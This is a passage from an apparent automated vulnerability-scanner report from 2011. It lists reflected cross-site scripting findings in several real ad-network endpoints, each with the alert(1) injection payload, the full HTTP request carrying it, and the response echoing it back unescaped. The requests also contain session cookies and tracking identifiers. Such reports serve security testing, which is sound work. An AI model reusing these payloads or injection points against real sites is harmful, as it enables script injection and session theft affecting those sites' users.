P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/464947510/x2336d6c"><script>alert(1)</script>77e70440218/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.171. http://ebay.adnxs.com/ttj [pt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320bc'-alert(1)-'47232191921 was submitted in the pt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384320bc'-alert(1)-'47232191921&pt2=0000951470&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwt43i6gQQt43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:47 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647287&Perf_Tracker_1=0000777384320bc'-alert(1)-'47232191921&Perf_Tracker_2=0000951470&Perf_Tracker_3=1183&imp_id=8886539978897813417&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEA
...[SNIP]...

1.172. http://ebay.adnxs.com/ttj [pt2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15a6a'-alert(1)-'5f2f4eb2edd was submitted in the pt2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=000095147015a6a'-alert(1)-'5f2f4eb2edd&pt3=1183&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwu43i6gQQu43i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P>wP?'k!>#Sc#Q0wG>ehEXh'cvTtWpuD`i3_xlS]=e@@#WVG93ZY4u96P7D+aP!tax]Ar:exw7qy2kctYf4]Ks*mLs/?cJ7s(5OpJ'J7l*!I)(S)H583(]MIRAZ.PYa$q`Mb<ZX40>XBzN(=`_6FU$bYGILL/'(=(W<F:LrcFt?s[%fU+fe*5I?!GvM7n6@%lW(%WUoR-JyuKI'#zNHys<uIyR(:fd6Y7cZzXG_g2R('%z.c^77c]N5y<l>wCs#e>2oQfSw+%_CYI(:/izth1aXbqK1[tuKPR4bYj[FoBl$ppax7-77r+lbUAtCfImKFJ%XF>-'obJe[kE/hrvX_i-NS!Z^XYKTdg3N.o=jLz2F#GnDkd5CEhYRZziD/hEFNIV.#qCT+[?Ma%T#sgFG5wZPK)D/#B@my`MYsXjEzp[GM`0nCH]Kn(1^I)hR=qwoGiL.o-aq[v$1pM_K)OY`hS(U-]vHyf.A%5w'0qV/w->VOE>Cl5w#x#=kVw`^]^cnpv51L-6hoUul_@fF]RP:N!Dh59jMafXQk6mTuYRkKZB2ck*z-$('vlN3`A5Ts]vo]l[1jXj`I]xd74F7(r_OC4Q+$le=sPI>6sJhum(aiwMrbP*=Qx-jQMmxf[iwdL!U`%4LEG9y#H%JOl9]SsNW; path=/; expires=Sun, 15-May-2011 01:34:51 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:34:51 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647291&Perf_Tracker_1=0000777384&Perf_Tracker_2=000095147015a6a'-alert(1)-'5f2f4eb2edd&Perf_Tracker_3=1183&imp_id=5777077306698984031&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

1.173. http://ebay.adnxs.com/ttj [pt3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ebay.adnxs.com
Path:   /ttj

Issue detail

The value of the pt3 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9484d'-alert(1)-'49a4b8e6987 was submitted in the pt3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ttj?id=220047&cb=6132271880&pt1=0000777384&pt2=0000951470&pt3=11839484d'-alert(1)-'49a4b8e6987&imp_id=v2:I:1297647242:6132271880:0000777384:0000951470:1183:0&pubclick=http://r1-ads.ace.advertising.com/click/site=0000777384/mnum=0000951470/cstr=75633200=_4d58868a,6132271880,777384^951470^1183^0,1_/xsxdata=$XSXDATA/bnum=75633200/optn=64?trg= HTTP/1.1
Host: ebay.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x300f22.js&size_id=18&account_id=6005&site_id=12414&size=180x150
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIv48BEAoYASABKAEwxI3i6gQQxI3i6gQYAA..; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByG2Z*cOV44Vx47:P?+T?'k!>#Sc#R/_.pahEXh'cvTtWpuD_=4!=uT]=e@@#WVG93ZY4u96P7D+aP!tax]Ju:exw7qy2_^tYf4]Ks*mLs/?cJ7s(5OkFNF7RzUee7ff.clx*lGIRAg2$MyRF`BXtGX40>XC?a++^.Da3$bYGIIrIg(1hE@#:LqW#t?t5/fU+fe*QeH%EDs_I6?4YY(%]+YR<+z_`zKlZNe9rt`oUb>:fau[7cZIHG_g3=uY$Vn8QGa7bZ>98l0>?G#e>2oQfSw+%_CYI)SH>(th6H*wZ'jlrpS?-D3oG7m:6E3i1C-V6/Lu8a0)9ic+!svi3SbOWR@K@qm[Y3<Uao60GsPo#VSI>rzH'*wtSE@w9]P7GnDkd5ChirRZy]z/hEEdIV.#pX.l[.M`Y:xt*dhBwZTyVD0dqymyiGVt9JX%p[GOv?BCDIpgDKcnMq2Vk]4p.su4l[kAU#HhCFWY$[II-1ah0=>'sPu%'u!9jpej-X1ql[c]Hv%we*u(w)z!.NfM*1TN]R)fpBW12a=jT2RR>.VPit6J8Uu/JCap<-4=h-@n$`y6'#!.^ft^[Tgza()x1[6kr)xY]xd8aEAv6IWbIdu$_*8GP`NxDJhlg'LQ?5sbP>IKx-jQMmws[qwdPTV`%0/vB-p=h%JOl9]V%rn; path=/; expires=Sun, 15-May-2011 01:35:00 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 14 Feb 2011 01:35:00 GMT
Content-Length: 1317

document.write('<script type="text/javascript"src="http://rover.ebay.com/ar/1/711-118167-2042-2/4?mpt=1297647300&Perf_Tracker_1=0000777384&Perf_Tracker_2=0000951470&Perf_Tracker_3=11839484d'-alert(1)-'49a4b8e6987&imp_id=9182123578777281571&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=180x150&adid=307892&mpvc= http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAACMkwvS-dG1_BWHfHSmrE
...[SNIP]...

1.174. http://ev.ib-ibi.com/pibiview.js [xid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ev.ib-ibi.com
Path:   /pibiview.js

Issue detail

The value of the xid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9831'%3balert(1)//11d8f3efe69 was submitted in the xid parameter. This input was echoed as d9831';alert(1)//11d8f3efe69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pibiview.js?go=2208&pid=12&xid=f978e9b0-271c-47b8-9a97-caba692f0bb2d9831'%3balert(1)//11d8f3efe69 HTTP/1.1
Host: ev.ib-ibi.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 02:28:46 GMT
Content-Length: 791

IB_PartnerViewSetupScript=new function(){this.LoadViewScript=function(){try{var s=window.document.createElement("script");s.setAttribute("type", "text/javascript");s.setAttribute("src", "https://ev.ib
...[SNIP]...
ld(s);}catch (Error){}};
this.ProcessRequest = function(){this.LoadViewScript();};}
function IBPartner(){}
IBPartner.prototype.Go='2208';IBPartner.prototype.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.prototype.Ida='';IBPartner.prototype.Pid='12'; IBPartner.prototype.Id1='';IBPartner.Go='2208';IBPartner.Xid='f978e9b0-271c-47b8-9a97-caba692f0bb2d9831';alert(1)//11d8f3efe69';IBPartner.Ida=
...[SNIP]...

1.175. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5f074<script>alert(1)</script>ccdbedd4d61 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.haaretz.com%2Fnews%2Fdiplomacy-defense%2Freport-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218&uid=YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61&xy=0%2C0&wh=300%2C250&vchannel=1056349&cid=EPCV0111A&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CAF399AA1BA194759D134605EFF6C6D9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Mon, 14 Feb 2011 01:37:30 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("YpffvxtzOKuYhLCm_405295695f074<script>alert(1)</script>ccdbedd4d61");

1.176. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6857d'-alert(1)-'6832ddace00 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=rkfhehSuCkCuR-F6FK4KQAAAAGBmZgJArkfhehSuCkCuR-F6FK4KQAqCdmWvEgIiBWHfHSmrEEKBi1hNAAAAAAQRAQC1AAAANQEAAAIAAACDaAIA0WMAAAEAAABVU0QAVVNEAKAAWALcANADyAUBAgUCAAIAAAAA4x3afwAAAAA.&tt_code=drudgereport.com&udj=uf%28%27a%27%2C+537%2C+1297648513%29%3Buf%28%27c%27%2C+5740%2C+1297648513%29%3Buf%28%27r%27%2C+157827%2C+1297648513%29%3Bppv%28783%2C+%272450541691773813258%27%2C+1297648513%2C+1298944513%2C+5740%2C+25553%29%3B&cnd=!6BUqYQjsLBCD0QkYACDRxwEo0AcxmZmZcRSuCkBCEwgAEAAYACABKP7__________wFIAFAAWNwBYABotQI.6857d'-alert(1)-'6832ddace00&referrer=http://www.drudgereport.com/&pp=TViLgQAFq_IK5TjPs25hd06kLUEGn6rqtMqyaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBsgOVgYtYTfLXFs_xlAf3wrmbC-_675oCl5_7xBrXgo-PDAAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0wNTAyNzE3MDkxMjc5MzczsgEUd3d3LmRydWRnZXJlcG9ydC5jb226AQoxNjB4NjAwX2FzyAEJ2gEcaHR0cDovL3d3dy5kcnVkZ2VyZXBvcnQuY29tL5gCuBfAAgTIAquCpQ6oAwHoA_sD6AOMA-gDmQP1AwAAAsT1AyAAAAA%26num%3D1%26sig%3DAGiWqtw_eL9DBqAZ0PN7cEKlsXl5DladFA%26client%3Dca-pub-0502717091279373%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=600&slotname=6309509649&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297648551504&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297648551509&frm=1&adk=3377972691&ga_vid=1250234459.1297648552&ga_sid=1297648552&ga_hid=1841793208&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2928058547&eid=33895298&fu=0&ifi=1&dtd=8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIsHAQChgBIAEoATD_jeLqBAoRCI54EAoYAiACKAIwoY7i6gQKEgj8iAEQChgBIAEoATDcjeLqBAoSCL-PARAKGAEgASgBMIuN4uoEEKGO4uoEGAQ.; acb717022=5_[r^208WMvBlUw20/dRC(+RZ?enc=q6qqqqqqCkAAAAAAAAAIQAAAAAAAAAhAFo_mI4TiCkDDEDl9Pd8NQOEABvpoyVx2BWHfHSmrEEIhh1hNAAAAAMs4AwA3AQAANQEAAAIAAADifwEAploAAAEAAABVU0QAVVNEACwB-gBYDgAA0wgBAgUCAAUAAAAACRsvXwAAAAA.&tt_code=cm.dailymail&udj=uf%28%27a%27%2C+3338%2C+1297647393%29%3Buf%28%27c%27%2C+15498%2C+1297647393%29%3Buf%28%27r%27%2C+98274%2C+1297647393%29%3Bppv%282932%2C+%278528913247041356001%27%2C+1297647393%2C+1297733793%2C+15498%2C+23206%29%3B&cnd=!bhaubAiKeRDi_wUYACCmtQEoADGprN67Pd8NQEITCAAQABgAIAEo_v__________AUgAUABY2BxgAGi1Ag..; sess=1; uuid2=4760492999213801733; anj=Kfw)mByDua)J710Ac5GcR!f@(ROX+G.i%-y.h2m%qj7e'(H1jcb#3G?aq.m2Ykj?PDQ18y2vSb1*ds9cO'ZB926yv^%?7':i^LR!)'U9qU1a2##<jV2FH4.>4YqxqfIC/Ir/(bO0p4FCo)YW9.prYxe0v%M:F=tvrWCs<l2ZIKr2w%S$G(H/o8+UPjm?x3:9_*#]wBGCpFqkhK=<bzA>cw#Z[W6>YJ^'Qr2#CNc2M>-]sOFY8ZhnxNN/Dx=:Z-Kv6+BVOBOnZNbtP#encho)SHW7WN!SeV=mT_9.G6J6Jv<s]RlGuqXm]Hc^i)7n9qn>nsQ<_(+.nhJ<f%Ccx54(LFjprN3tM+ST9s0YZ'xdQe/LQsNg<Wg/ktzbjNOU^GSM36c4re:c_dBck]ow89]LasnMwZuoQR?dIKhc)BSuKCjmJYcKUA9N$ZMTc(Wrv-la-%-_*GbC7a2f4i-1X(8IZJUDRaTKJvm(w%A28:xMW:NLzt%QdAMDhF#MEx$`=4dMc=5fkTF+h<J[mOjuWvOa/>UHDjzZlk:.NIvxF7>_dNRO)eM*mTQ=u?]w@$vjJ6ix<KR)GwX:48(S7uNg!'*V)@PBJPrP>6Qq@wFiUwW`EXQALy+Kcu0r%o:A<r%s?TaCpg6$q0j``ivp6Q[1yjwGrz+92PXhrBM5Rt#>E/DusgcXqu'Wg*O/qRH

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 15-Feb-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sun, 15-May-2011 01:55:52 GMT; domain=.adnxs.com; HttpOnly
